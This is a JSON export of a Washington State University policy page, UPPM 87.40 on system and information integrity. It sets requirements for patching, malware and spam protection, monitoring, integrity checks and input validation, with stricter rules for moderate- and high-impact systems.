{"id":43481,"date":"2020-06-15T09:31:45","date_gmt":"2020-06-15T16:31:45","guid":{"rendered":"https:\/\/policies.wsu.edu\/prf\/?page_id=43481"},"modified":"2026-02-20T16:24:20","modified_gmt":"2026-02-21T00:24:20","slug":"bppm-87-40","status":"publish","type":"page","link":"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-40\/","title":{"rendered":"87.40 System and Information Integrity"},"content":{"rendered":"\n<h1 class=\"wp-block-heading wsu-font-size--xxmedium\">University Policies and Procedures Manual&nbsp;(previously Business Policies and Procedures Manual)<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">System and Information Integrity<\/h2>\n\n\n<div class=\"wsu-row wsu-row--single\" >\r\n    \n<div class=\"wsu-column\"  style=\"\">\r\n\t\n\n<p><strong>UPPM 87.40<\/strong><\/p>\n<p><strong>For more information contact:<\/strong><br \/>\u00a0 \u00a0<a href=\"https:\/\/its.wsu.edu\/how-can-we-help-contact-its\/\">Information Technology Services<\/a><\/p>\n<hr \/>\n<div id=\"toc_container\">\n<h3>Contents<\/h3>\n<ul class=\"toc_list\">\n<li><a href=\"#One_0\">1.0 \u00a0\u00a0 Overview and Purpose<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#One_1\">1.1 \u00a0\u00a0 Information Assurance Policies Generally<\/a><\/li>\n<li><a href=\"#One_2\">1.2 \u00a0\u00a0 Specific Policy Overview and Purpose<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Two_0\">2.0 \u00a0\u00a0 Applicability<\/a><\/li>\n<li><a href=\"#Three_0\">3.0 \u00a0\u00a0 Roles and Responsibilities<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#Three_1\">3.1 \u00a0\u00a0 Chief Information Officer<\/a><\/li>\n<li><a href=\"#Three_2\">3.2 \u00a0\u00a0 Information Owners<\/a><\/li>\n<li><a href=\"#Three_3\">3.3 \u00a0\u00a0 Office of Information Security and Assurance (OISA)<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Four_0\">4.0 \u00a0\u00a0 Requirements<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#Four_1\">4.1 \u00a0\u00a0 General Requirements<\/a><\/li>\n<li><a href=\"#Four_2\">4.2 \u00a0\u00a0 Moderate- and High-Impact Systems<\/a><\/li>\n<li><a href=\"#Four_3\">4.3 \u00a0\u00a0 High-Impact Systems<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Five_0\">5.0 \u00a0\u00a0 Training<\/a><\/li>\n<\/ul>\n<\/div>\n<h3 id=\"One_0\">1.0 Overview and Purpose<\/h3>\n<h4 id=\"One_1\">1.1 Information Assurance Policies Generally<\/h4>\n<p>The purposes of the information assurance policies in UPPM Chapter 87: Information Technology and Security are to:<\/p>\n<ul>\n<li>Set requirements to ensure the privacy, confidentiality, integrity, and availability of Washington State University (WSU) data;<\/li>\n<li>Support institutional goals and strategies with appropriate methods for administratively, technically, and operationally protecting data; and<\/li>\n<li>Define the criteria WSU follows to meet requirements for protecting data, which are determined by Information Owners.<\/li>\n<\/ul>\n<p>The policies in this chapter comply with Federal Information Processing Standards (<a href=\"https:\/\/nvlpubs.nist.gov\/nistpubs\/fips\/nist.fips.199.pdf\">FIPS 199<\/a>), which are intended to help organizations achieve a common level of quality and interoperability in information technology (IT) by requiring categorization of systems as low-impact, moderate-impact, or high-impact for the stated security objectives of confidentiality, integrity, and availability. To determine the potential consequence of a loss event, the Federal Information Processing Standards:<\/p>\n<ul>\n<li>Define WSU Information Owners\u2019 impact categorization rating (Low, Moderate, or High);<\/li>\n<li>Dictate which security controls are mandatory based upon the categorization level;<\/li>\n<li>Define the strength, frequency, and formalization of those controls; and<\/li>\n<li>Influence audit burden and continuous monitoring rigor.<\/li>\n<\/ul>\n<p>See <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-01\/\">UPPM 87.01<\/a> for definitions, general information, and violations related to this policy, as well as additional information regarding roles and responsibilities.<\/p>\n<h4 id=\"One_2\">1.2 Specific Policy Overview and Purpose<\/h4>\n<p>Ensuring that WSU\u2019s systems and information are protected helps maintain a secure and reliable IT environment that supports WSU\u2019s academic, research, and administrative missions. This policy establishes the requirements to prevent, detect, and correct vulnerabilities across WSU\u2019s systems.<\/p>\n<h3 id=\"Two_0\">2.0 Applicability<\/h3>\n<p>This policy applies to all WSU system users who have contact with, or potentially may have contact with, WSU data, applications, and computing resources.<\/p>\n<p>Security control exceptions to policy statements in UPPM Chapter 87 are managed and maintained in accordance with <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-23\/\">UPPM 87.23<\/a>.<\/p>\n<h3 id=\"Three_0\">3.0 Roles and Responsibilities<\/h3>\n<h4 id=\"Three_1\">3.1 Chief Information Officer<\/h4>\n<p>The Chief Information Officer (CIO) of WSU, or designee, is responsible for administering this policy and reviewing it on an annual basis.<\/p>\n<h4 id=\"Three_2\">3.2 Information System Owners<\/h4>\n<p>WSU Information System Owners, or their delegates, are responsible and accountable for developing appropriate Standard Operating Procedures (SOPs) for this policy&#8217;s implementation.<\/p>\n<h4 id=\"Three_3\">3.3 Office of Information Security and Assurance (OISA)<\/h4>\n<p>WSU\u2019s Office of Information Security and Assurance (OISA) shall maintain the <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standard (PDF)<\/a> associated with this policy and provide guidance for the associated procedures for the implementation of this policy (<a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-procedure.pdf\/\">see examples (PDF)<\/a>).<\/p>\n<p><strong>Note:<\/strong> While all units are required to adhere to the standard established by OISA (<a href=\"https:\/\/csrc.nist.gov\/pubs\/sp\/800\/53\/r5\/upd1\/final\">NIST SP 800-53<\/a>), procedural examples for implementation are optional.<\/p>\n<h3 id=\"Four_0\">4.0 Requirements<\/h3>\n<h4 id=\"Four_1\">4.1 General Requirements<\/h4>\n<p>Prior to implementation of information systems, WSU Information System Owners, or their delegates, are required to remediate software and firmware vulnerabilities and flaws. Security relevant software and firmware updates are to be installed in accordance with <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-30\/\">UPPM 87.30<\/a>.<\/p>\n<p>Software updates are to be tested in a non-production environment.\u00a0<\/p>\n<p>Centrally managed spam protection mechanisms must be employed at information system entry and exit points to detect and\u00a0act\u00a0on unsolicited messages.\u00a0<\/p>\n<p>Security tool malicious code protection mechanisms must be employed at information system entry and exit points as well as system endpoints.\u00a0\u00a0<\/p>\n<p>The malicious code and spam protection mechanisms are to be automatically updated whenever new releases are available, in accordance with WSU\u2019s OISA <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standards (PDF)<\/a>.<\/p>\n<p>Malicious code protection mechanisms\u00a0must\u00a0perform periodic scans of information systems and take automated actions against any discovered malicious code.\u00a0<\/p>\n<p>File scanning\u00a0must\u00a0be configured to run real-time for\u00a0files from external sources, as files are downloaded, opened, or executed.\u00a0<\/p>\n<p>Upon detection of malicious code, the malicious code protection mechanisms\u00a0must\u00a0block and\/or quarantine malicious code and send alerts to the\u00a0WSU Security Operations Center (SOC).\u00a0<\/p>\n<p>Information\u00a0System\u00a0Owners, or\u00a0their\u00a0delegates, must ensure that information systems are\u00a0monitored\u00a0to detect:\u00a0<\/p>\n<ul>\n<li>Attacks;\u00a0<\/li>\n<li>Indicators of potential attacks; and\u00a0<\/li>\n<li>Unauthorized use.\u00a0\u00a0<\/li>\n<\/ul>\n<p>Information systems are to be\u00a0monitored\u00a0continuously to provide analysis of alerts and\/or notifications generated by institutional information systems.\u00a0<\/p>\n<p>The level of information system monitoring\u00a0is to\u00a0be heightened when there is\u00a0an indication\u00a0of increased risk to operations, assets, and\/or individuals.\u00a0<\/p>\n<p>Business units\u00a0are to\u00a0receive system security alerts, advisories, and directives on an ongoing basis:\u00a0<\/p>\n<ul>\n<li>Internal security alerts, advisories, and directives\u00a0are to\u00a0be\u00a0generated and\u00a0disseminated\u00a0as necessary.\u00a0<\/li>\n<li>Security alerts, advisories, and directives are to be implemented in accordance with WSU\u2019s OISA <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standards (PDF)<\/a>.<\/li>\n<\/ul>\n<p>Business\u00a0Units\u00a0are to\u00a0ensure that applicable internal security alerts, advisories, and directives are\u00a0disseminated\u00a0to institutional\u00a0Area\u00a0Technology\u00a0Officers (ATOs),\u00a0Information\u00a0System\u00a0Owners, and other business unit personnel as needed.\u00a0\u00a0<\/p>\n<p>Business units\u00a0must\u00a0maintain\u00a0a list of authorized business information systems and software.\u00a0The list\u00a0is to\u00a0be protected to prevent loss of integrity.\u00a0<\/p>\n<p>WSU\u00a0personnel\u00a0are to\u00a0be alerted to failed security and privacy verification tests and when anomalies are discovered.\u00a0<\/p>\n<p>WSU\u00a0developers\u00a0must ensure error messages generated from the information system\u00a0provide\u00a0the information necessary for corrective actions without revealing information that could be exploited by adversaries.\u00a0\u00a0<\/p>\n<h4 id=\"Four_2\">4.2 Moderate- and High-Impact Systems<\/h4>\n<p>In addition to the above, the following requirements apply to all moderate and high-impact systems.<\/p>\n<p>Moderate- and high-impact\u00a0systems\u00a0must\u00a0use automated mechanisms to\u00a0determine\u00a0if system components have applicable security\u00a0relevant software and firmware updates installed.\u00a0<\/p>\n<p>Moderate- and high-impact systems\u00a0must\u00a0define and implement controls to protect the\u00a0system\u00a0memory from unauthorized code execution.\u00a0<\/p>\n<p>Moderate- and high-impact systems\u00a0must\u00a0employ automated tools and mechanisms to support analysis of events.\u00a0<\/p>\n<p>Moderate- and high-impact systems must\u00a0define and\u00a0monitor\u00a0inbound and outbound communications traffic for unusual or unauthorized activities or conditions.\u00a0<\/p>\n<ul>\n<li>Alerts\u00a0must\u00a0notify relevant personnel when indications of compromise or potential compromise occur.\u00a0<\/li>\n<\/ul>\n<p>Moderate- and high-\u00a0impact systems must\u00a0use integrity verification tools to detect unauthorized changes to the software, firmware, and information.\u00a0<\/p>\n<ul>\n<li>Response actions\u00a0must\u00a0occur when unauthorized changes to the software, firmware, and information are detected.\u00a0<\/li>\n<li>Integrity checks\u00a0are to\u00a0be performed during system startup, restart, and shutdown.\u00a0<\/li>\n<li>Detection of unauthorized changes to authorized business systems and software\u00a0is to\u00a0be processed\u00a0in accordance with\u00a0<a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-55\/\">UPPM 87.55<\/a>.\u00a0<\/li>\n<\/ul>\n<p>Moderate- and high-impact\u00a0systems\u00a0must\u00a0implement cryptographic authentication mechanisms to verify the integrity of software or firmware components.\u00a0<\/p>\n<p>Moderate- and high-impact systems must\u00a0validate\u00a0syntax and semantics of system inputs to prevent cyberattacks, such as cross-site scripting and a variety of injection attacks.\u00a0\u00a0<\/p>\n<h4 id=\"Four_3\">4.3 High-Impact Systems<\/h4>\n<p>In addition to the above, the following requirements apply to all high-impact systems.<\/p>\n<p>High-impact systems must\u00a0consider\u00a0enabling\u00a0provisions to ensure encrypted communications are visible to WSU monitoring tools and mechanisms.\u00a0<\/p>\n<p>High-impact systems must\u00a0automatically alert personnel when indications of inappropriate or unusual activities occur as defined in <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-50\/\">UPPM 87.50<\/a>.<\/p>\n<p>High-impact systems must\u00a0regularly verify the correct operation of security and privacy functions during system transitional states and upon command by a user with\u00a0appropriate privilege.\u00a0<\/p>\n<p>High-impact systems must\u00a0employ automated tools to notify relevant personnel upon discovering discrepancies during integrity verification.\u00a0<\/p>\n<p>When integrity violations are discovered, high-impact systems are to\u00a0be configured to automatically shut down, restart,\u00a0and\/or trigger an audit alert.<\/p>\n<h3 id=\"Five_0\">5.0 Training<\/h3>\n<p>See <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-21\/\">UPPM 87.21<\/a> for training requirements related to UPPM Chapter 87.<\/p>\n<p>In addition to the requirements in <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-21\/\">UPPM 87.21<\/a>, Information System Owners are responsible for ensuring that users receive appropriate information security and privacy training commensurate with their roles, responsibilities, and authorized access to information systems under the Information System Owner\u2019s authority.<\/p>\n<p style=\"font-size: .8rem\">_______________________<br \/><strong>Revisions:<\/strong>\u00a0 Feb. 2026 (Rev. <a href=\"https:\/\/policies.wsu.edu\/prf\/bppm-manual-revisions\/bppm-revision-651\/\">651<\/a>); July 2020 &#8211; new policy (Rev. <a href=\"https:\/\/policies.wsu.edu\/prf\/bppm-manual-revisions\/bppm-revision-552\/\">552<\/a>)<\/p>\n\n<\/div>\r\n\n<\/div>","protected":false},"excerpt":{"rendered":"<p>University Policies and Procedures Manual&nbsp;(previously Business Policies and Procedures Manual) System and Information Integrity<\/p>\n","protected":false},"author":1061,"featured_media":0,"parent":50633,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"wsuwp_university_location":[],"wsuwp_university_org":[],"_links":{"self":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481"}],"collection":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/users\/1061"}],"replies":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/comments?post=43481"}],"version-history":[{"count":25,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481\/revisions"}],"predecessor-version":[{"id":69990,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481\/revisions\/69990"}],"up":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/50633"}],"wp:attachment":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/media?parent=43481"}],"wp:term":[{"taxonomy":"wsuwp_university_location","embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/wsuwp_university_location?post=43481"},{"taxonomy":"wsuwp_university_org","embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/wsuwp_university_org?post=43481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}